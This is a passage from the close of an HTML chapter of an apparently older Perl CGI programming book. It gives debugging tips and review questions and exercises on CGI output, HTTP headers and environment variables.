</TT>to <TT>STDOUT </TT>so

that the messages appear in the client Web browser's window. If

you have a complex problem, consider using CGItap, a program that

lets you see all of the environment variables available to your

program.

<P>

The next chapter, &quot;Form Processsing,&quot; will introduce

you to HTML forms and how CGI programs can process form information.

After the introduction, a Guest book application will be presented.

Guest books let visitors leave comments that can be viewed later

by other visitors.

<H2><A NAME="ReviewQuestions"><FONT SIZE=5 COLOR=#FF0000>

Review Questions</FONT></A></H2>

<P>

Answers to Review Questions are in Appendix A.

<OL>

<LI>Is CGI a programming language?

<LI>Are CGI and Java the same type of protocol?

<LI>Do CGI program files need to have the write turned on?

<LI>What is the first line of output for CGI programs?

<LI>What information does the <TT>HTTP_USER_AGENT</TT>

contain?

<LI>Why is CGItap a useful program?

</OL>

<H2><A NAME="ReviewExercises"><FONT SIZE=5 COLOR=#FF0000>

Review Exercises</FONT></A></H2>

<OL>

<LI>Convert the program in Listing 19.1 so that it displays an

HTML document.

<LI>Convert the program in Listing 19.1 so that it uses the <TT>Location:</TT>

HTTP header.

<LI>Convert the program in Listing 19.1 so that it displays all

environment variables. Hint: <TT>foreach

(sort(keys(%ENV))) { ... }</TT>.

<LI>Write a CGI script that prints &quot;Thanks, you're doing

a great job!&quot; in your Web server's error log file.

</OL>

<HR>



<CENTER><P><A HREF="ch18.htm"><IMG SRC="pc.gif" BORDER=0 HEIGHT=88 WIDTH=140></A>

<A HREF="#CONTENTS"><IMG SRC="cc.gif" BORDER=0 HEIGHT=88 WIDTH=140></A>

<A HREF="index.htm"><IMG SRC="hb.gif" BORDER=0 HEIGHT=88 WIDTH=140></A>

<A HREF="ch20.htm"><IMG SRC="nc.gif" BORDER=0 HEIGHT=88 WIDTH=140></A>

<HR WIDTH="100%"></P></CENTER>

</BODY>

</HTML>

